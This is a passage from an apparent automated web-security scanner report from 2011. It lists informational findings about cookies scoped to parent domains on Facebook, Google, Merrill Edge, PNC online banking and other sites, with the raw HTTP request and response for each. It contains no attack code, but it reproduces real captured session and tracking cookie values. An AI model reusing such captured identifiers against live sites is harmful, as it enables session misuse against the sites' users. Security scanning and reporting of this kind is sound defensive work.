<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.123. http://www.facebook.com/campaign/landing.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sat, 05-Mar-2011 01:06:44 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 01:06:44 GMT
Content-Length: 0


10.124. http://www.firstusa.com/xcards4/common/weblinking/weblinking.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstusa.com
Path:   /xcards4/common/weblinking/weblinking.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xcards4/common/weblinking/weblinking.html HTTP/1.1
Host: www.firstusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:06:46 GMT
Content-length: 5936
Content-type: text/html
Set-Cookie: v1st=49DB682DE70C7979; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.firstusa.com
Last-modified: Thu, 16 Dec 2010 13:58:38 GMT
Etag: "1730-4d0a1b0e"
Accept-ranges: bytes
Connection: close

<html><head><title>Important Information on Weblinking from Chase</title>
<link href="http://www.bankone.com/bolStyle.css" rel="stylesheet" type="text/css">
<SCRIPT Language="javascript" TYPE="text/j
...[SNIP]...

10.125. http://www.google.com/finance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /finance HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Thu, 03 Feb 2011 01:11:52 GMT
Expires: Thu, 03 Feb 2011 01:11:52 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...

10.126. http://www.google.com/setprefs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /setprefs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /setprefs?sig=0_wmOEOqCEugI_DX4CRMM9-gOiSPQ=&suggon=2&prev=http://www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dipboard%2Bsoftware HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 302 Found
Location: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ipboard+software
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:LD=en:TM=1293845297:LM=1296695282:GM=1:SG=2:S=srN-EBSZQitQMjet; expires=Sat, 02-Feb-2013 01:08:02 GMT; path=/; domain=.google.com
Date: Thu, 03 Feb 2011 01:08:02 GMT
Server: gws
Content-Length: 277
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/search?sou
...[SNIP]...

10.127. http://www.grist.org/article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.grist.org
Path:   /article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren HTTP/1.1
Host: www.grist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 01:15:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: PHPSESSID=394bce86b159c0f351253ee87caa8df9; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_visit=981364550; expires=Fri, 03-Feb-2012 01:15:50 GMT; path=/; domain=.grist.org
Set-Cookie: exp_last_activity=1296724550; expires=Fri, 03-Feb-2012 01:15:50 GMT; path=/; domain=.grist.org
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A82%3A%22%2Farticle%2Ffood-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren%2F%22%3B%7D; path=/; domain=.grist.org
Last-Modified: Thu, 03 Feb 2011 01:15:50 GMT
Content-Type: text/html
X-Cache: MISS from grist-squid02.prod.grist.org
X-Cache-Lookup: MISS from grist-squid02.prod.grist.org:80
Via: 1.0 grist-squid02.prod.grist.org (squid/3.1.8)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.faceb
...[SNIP]...

10.128. http://www.guardian.co.uk/business/2011/jan/11/offshore-oil-industry-white-house  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /business/2011/jan/11/offshore-oil-industry-white-house

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /business/2011/jan/11/offshore-oil-industry-white-house HTTP/1.1
Host: www.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:15:50 GMT
Server: Apache
X-GU-jas: 07-16121
X-GU-PageRenderer: DefaultPageRenderer
Content-Language: en
Content-Type: text/html; charset=UTF-8
Set-Cookie: GU_MU=VFVvQnhRcjZERHdBQUNoYlFSUUFBQUJafEkxMytueWM9; path=/; domain=.guardian.co.uk; expires=Sun, 31-Jan-2021 01:15:49 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6dHg6NDpkYWxsYXM6Mzo2MjM6YnJvYWRiYW5kOiAzMi43ODc6LTk2Ljc5OUA0NzI1NDI3MTgzMTgzMjE1MjMzMTk3MTM1OTcyNjIyMTAxNzUyOQ==; path=/; domain=.guardian.co.uk; expires=Thu, 24-Feb-2011 01:15:49 GMT
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 03
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Length: 98316


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" l
...[SNIP]...

10.129. http://www.ibsnetaccess.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibsnetaccess.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.ibsnetaccess.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 21:59:58 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=C697A0BA2F17102F003A8D446414B7D1; Path=/; Domain=.ibsnetaccess.com
Set-Cookie: TLTUID=C697A0BA2F17102F003A8D446414B7D1; Path=/; Domain=.ibsnetaccess.com; Expires=Wed, 02-02-2021 21:59:58 GMT
Last-Modified: Tue, 30 Mar 2010 00:12:24 GMT
ETag: "8e2008-294-7be64a00"
Accept-Ranges: bytes
Content-Length: 660
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>FIA Card Services Net Access</TITLE>
<META NAME = "Keywords" CONTENT = "FIA Card Services, FIA card services, net access, FIA Card Services Net Access, FIA card services
...[SNIP]...

10.130. http://www.merrilledge.com/m/pages/self-directed-investing.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/self-directed-investing.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/pages/self-directed-investing.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=8DVPG6bhLhltEG1FjhrgafC0CcuM/mzhZg+ZO4Fn4N7V8Ap55lrmyz9HWpZ+FVMYcuGvGsLs+F8fomu+ZqybyYrEqEFhdL+uE42cL4uzTOojaJYo1xb91lRcgZUAJzx6CG+Xvv8KLTkamtoYiMO0tXoyB5SnItLVDSCnSA7T6+JH6sF9+tCBdKyH8JAxP7JQXa7Gbyn7VfXyPbdn2MQ5YjS4TDtJiHPV2n3kwEIzWscBtsEdkM6B3v1AJFdcl961XkKl4NRv+R1cnaz0OJDIgtBgBOIAH33VI4JPEq6R5KFdMBd9oeCkaZdSV/RUibkCgyKsOopPRnBjAR1ucPhGAHIGXmpmJNjH9+p+u3tPYW+y7+fq/z+YtIQ9lLGo9PuXxLw4yf2ryu0xsfnN/cX0Rv5hKpnfqHXTiFNLdooF4fwFhVRPHVGcsX4+v9NJKw1e2k91+AU0eZaak/U3SNwC2zplr+xrLUnCiOnmv5aWpBA2QRFH4sqmlb7tOVHg76fm4QmkzCNoA0wieztn3baqZD/I86Hadaelj/nZ2rgCYs8h7uYmxIEzU6VGZ7ZCF2NoBYFeb4eIZlqZ/+or03iZf/6o5LLOb37KbV8wy0Exz8cy8AP6iADkE4FsuKEzScKb; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=8ddb7e626e0c4eac90fb5dc54d017916; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 99467


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...

10.131. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/zero-dollar-trades.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/pages/zero-dollar-trades.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=9sTztPG9LIpTqCRqm5C/4EacAM+v7Pe04GMW3r5atCVT71fZQlEkwugZOjyBvesjG5IMK7yC4z+rzi52Y2Rwfzioa6Te7w2siYkFLhTMBHilWY4Q6yBX7NgBAxU1BK1JRv0vK2haKUjfkBFQ4hSjXxU9DS2ElZwfKBDrfdwYRG/DfEkCZMfk7kOOv3/RCE7cXyczgqEb3jGq+lq14GXRid9xAckqjAw8nQQDb9QtElhfHjwQ13IMhVRuoNSl34XxSizadDPOfV5ROZ9ptH3YDolLXCkbRu+2t6/lBdbbpFWsJfJ7DclHs5472SkUIqFunvN7HfcOWkpUEeNtSZ86pP6LYe5ksGeClXhKqiGCumb0CdjphGaPavyyAa243o79JwOyKse04wKOloP6arxbLtLk8Av0o1NQ83V+rPNWmGvpKCtw6q5AOnDFr0JExL5pwuLMU8GXOq6LvQgdydKKEwi+kzu5A1cR6YW039SrUi8/P+OwrPBM58oY2ykRFCUTfS/jIs7yDuiPlaUSz7jJgCcALG0fDiV5utWLvZc+vNv6B+ra0Q3k7FFXg0vIFIJeSnPCAFTMbKDD5mSYSR/gvNgzHO5QN5BLiw3cG1uC2DYUEcY+zcFJ4hObnWi8iqYb; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=fc00ac76623c478fade3bfb4e83564ed; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 91816


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...

10.132. https://www.merrilledge.com/m/pages/home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/pages/home.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=+3nYGeeE+NPdhSQG3vh+HTqhnIVv2HDbcYHGjp54fTB2eN8gWiB5w9oZxieXINxyqp5JOkWFYpxYSlEUp+s/Q7dr/qI2dW4+Ugpj9Ak4HneKuqAmlrb9+b1lkfb5z1x01mFDUVUSIPYlzqUceh73FNi2dPFIGUKgIrS5YIX0VBG3Kvli+WXEUzA7MvB4u5+Py7hXzFl2ORnsgVAu/Q1zWhLJKMtsBGrF/kIITSL0QaUJLsFt1mJRkosThEinabeRLDNi7M3YfO8wlKzm7S/B4D7p2u5Ayo2RQLBc18md65QkSsQY684a0I+0n4l2tFejlKie8oTEEzEd1h4/38tbkAQPmqC7kZDPfpNiMp3x7g7+sQ9iY5IsI0nIEkrpqitpkAvfVRHp/q7rPO7Eb1rSSTXtThYXqMEQsxKQIVS0AC82nDR2hbKY7xCDjqXsAEHo8nuo3VN2ebUSNpzuny4qEnUzC7b+k3WQKNy5wsp07CNxBAJQojRx5NQNw1xQyJfaQ6R8CsLqvuK9to/Ypp9xRkRlF27tPV9g2nrXGMcvOFz5HQIJqD5zfSuYF1SPhTc5tj8W5U6dRGuwHkHGPzos1a1H98yr4g+RpcHn8DNPXR1oSvecaDlW11MMEwLXbB4Q; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=6e232d9b30534bdfa9d614bf9ec5848f; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 105239


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...

10.133. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/merrill-edge-advisory-center.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/pages/merrill-edge-advisory-center.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=KDC8DK5B+KFv3Wz0S4K2LXSI4NgojmEdX2lulfZHWNW5jh+8BzJJh8KHjWLs1JqTo+0StslhsZtq4lyyEMIl0GAzy4I5jHURcU1INosJRPZPUqnycZXXkgvlWX/bMnXF1SioazWzlZBumjo782mfcGOSGzZ6T2j52k8DJwFasAcEq6ZcsHEQxgNk+ah8BOdvTcviU2WAGv0G+CeQus7N0onu+TGDhQ0W39ik0Cg9UB3KRVXs2KbKjqellsaunYWAIq1kwbkhHpHXGKLQUsg3glJkNpgNxmSQiWiC4o+mK7ggegysuL3PcK5zTI1Iw9XexI9N8wLqYLNQUz/0jdrKZmkQ0Ip2Zm1FhMKWvXjkVhktzIcKIr/IcMNQa8XEdZ7JERXHmTOamI52E0ET2IBtTGVVEeUOdGrvQiyegTguDsbQD4MSTWmYQ7ZXGSyXgruiBshchcGbOLHIKS6SvFT7pgjTnLK9JScdNdpYCvCG9cjkUtFjpNOSVxi1bKz5Xu8TO49YSSs9iFmlCix8Q1nG2I+rzTBtxIyWVW1GT9AoeRDYu5HzhJKISmwaX2qvWrTBe014K56+FA4eWCo9BOF9XQlpxTB1WpVbsoxwa3Rg7LNsq9S1GpNb8XRTJtfcmDvw; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Location: http://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx
Set-Cookie: pxs=671d45371feb47b7b0d445f52cd92025; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 101016


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...

10.134. https://www.mystreetscape.com/my/charteroneinvest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mystreetscape.com
Path:   /my/charteroneinvest

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my/charteroneinvest HTTP/1.1
Host: www.mystreetscape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: FWS/7.0
Date: Wed, 02 Feb 2011 22:19:32 GMT
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
Set-cookie: MC=ICnV^lPuGcmwLOC9l5HCSfEXjIkSAk1J2HQKA0w6IAAOywABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT
Set-cookie: spc=311; path=/
Cache-control: public
Set-cookie: HttpOnly
Set-cookie: JSESSIONID=48E9C3976D90BB921D5C93D8E938BE52; path=/; secure
Content-length: 264
Content-type: text/html
Fsreqid: REQ4d49d8740a034c3a20000ecb0000aa33
Fscalleeid: ibweb311
Fselapsedtime: 9719
Connection: close


<html>

<head>


<title>
Charter One Investments
</title>

</head>

<FRAMESET ROWS="100%, *" frameborder=no border=0>
<FRAME NAME="mainframe" onload='javascript:' SRC="/my/charteroneinvest/jsp/
...[SNIP]...

10.135. https://www.mystreetscape.com/my/citizensinvest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mystreetscape.com
Path:   /my/citizensinvest

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my/citizensinvest HTTP/1.1
Host: www.mystreetscape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: FWS/7.0
Date: Wed, 02 Feb 2011 22:19:32 GMT
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
Set-cookie: MC=^dlv6nLB_DEtlMTGowZrrNRWb_gSAk1J2HQKA0w6IAAO3QABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT
Set-cookie: spc=321; path=/
Cache-control: public
Set-cookie: HttpOnly
Set-cookie: JSESSIONID=7117D3482F67F60B23716F580E8C6714; path=/; secure
Content-length: 259
Content-type: text/html
Fsreqid: REQ4d49d8740a034c3a20000edd0000aa33
Fscalleeid: ibweb321
Fselapsedtime: 9769
Connection: close


<html>

<head>


<title>
Citizens Investments
</title>

</head>

<FRAMESET ROWS="100%, *" frameborder=no border=0>
<FRAME NAME="mainframe" onload='javascript:' SRC="/my/citizensinvest/jsp/login
...[SNIP]...

10.136. https://www.onlinebanking.pnc.com/alservlet/ForgotUserIdServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinebanking.pnc.com
Path:   /alservlet/ForgotUserIdServlet

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alservlet/ForgotUserIdServlet HTTP/1.1
Host: www.onlinebanking.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:02 GMT
Set-Cookie: TLTSID=9475541C2F1A102F354FD76FFB2DDB3C; Path=/; Domain=.pnc.com
Set-Cookie: TLTUID=9475541C2F1A102F354FD76FFB2DDB3C; Path=/; Domain=.pnc.com; Expires=Wed, 02-02-2021 22:20:02 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=a2rTe6HbXeEUyxbPOB/wDA==;GUID=1|SOvXcHCTZwCP2IOhhrT_-R3ODct1iF1OWGlj8LUk9syXcKsRohI8ZicVwfm-BX0p|L2Fsc2VydmxldC9Gb3Jnb3RVc2VySWRTZXJ2bGV0
Pragma: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Cache-Control: no-cache, max-age=0, s-maxage=0, must-revalidate, proxy-revalidate, no-store, private
Content-Length: 6173
Set-Cookie: JSESSIONID=0000nBH4sfMW7CTudVPIJFBuabh:pr-rdc910-61021wbb-a/wbbob.0-ethprod9; Path=/
Set-Cookie: JSESSIONID=0000oDYthmTWj122o-2a9jXeLh-:pr-rdc910-61021wbb-a/wbbob.0-ethprod9; Path=/
Keep-Alive: timeout=60, max=297
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: NSC_q*xccpc-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423992;path=/;secure;httponly
Set-Cookie: NSC_q*xccpc-w0-htmc*443=ffffffffa9c1221345525d5f4f58455e445a4a420000;path=/;secure;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...

10.137. https://www.onlinebanking.pnc.com/alservlet/OnlineBankingServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinebanking.pnc.com
Path:   /alservlet/OnlineBankingServlet

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alservlet/OnlineBankingServlet HTTP/1.1
Host: www.onlinebanking.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:02 GMT
Set-Cookie: TLTSID=942C620C2F1A102F3549D76FFB2DDB3C; Path=/; Domain=.pnc.com
Set-Cookie: TLTUID=942C620C2F1A102F3549D76FFB2DDB3C; Path=/; Domain=.pnc.com; Expires=Wed, 02-02-2021 22:20:02 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=a2rTe6HbXeEUyxbPOB/wDA==;GUID=1|SOvXcHCTZwCP2IOhhrT_-R3ODct1iF1OWGlj8LUk9syXcKsRohI8ZicVwfm-BX0p|L2Fsc2VydmxldC9PbmxpbmVCYW5raW5nU2VydmxldA..
Content-Length: 4786
Set-Cookie: JSESSIONID=0000BdPbwUSdfmxZ303XrJmvcTx:pr-rdc910-61021wbb-a/wbbob.0-ethprod9; Path=/
Set-Cookie: JSESSIONID=0000ZZetK8QvUfDV8Q-gaArIsLv:pr-rdc910-61021wbb-a/wbbob.0-ethprod9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=299
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: NSC_q*xccpc-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423992;path=/;secure;httponly
Set-Cookie: NSC_q*xccpc-w0-htmc*443=ffffffffa9c1221345525d5f4f58455e445a4a420000;path=/;secure;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>PNC Bank Online Banking</title>
<meta http-equiv="Expires" content="
...[SNIP]...

10.138. http://www.retirement.merrilledge.com/IRA/pages/home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retirement.merrilledge.com
Path:   /IRA/pages/home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /IRA/pages/home.aspx HTTP/1.1
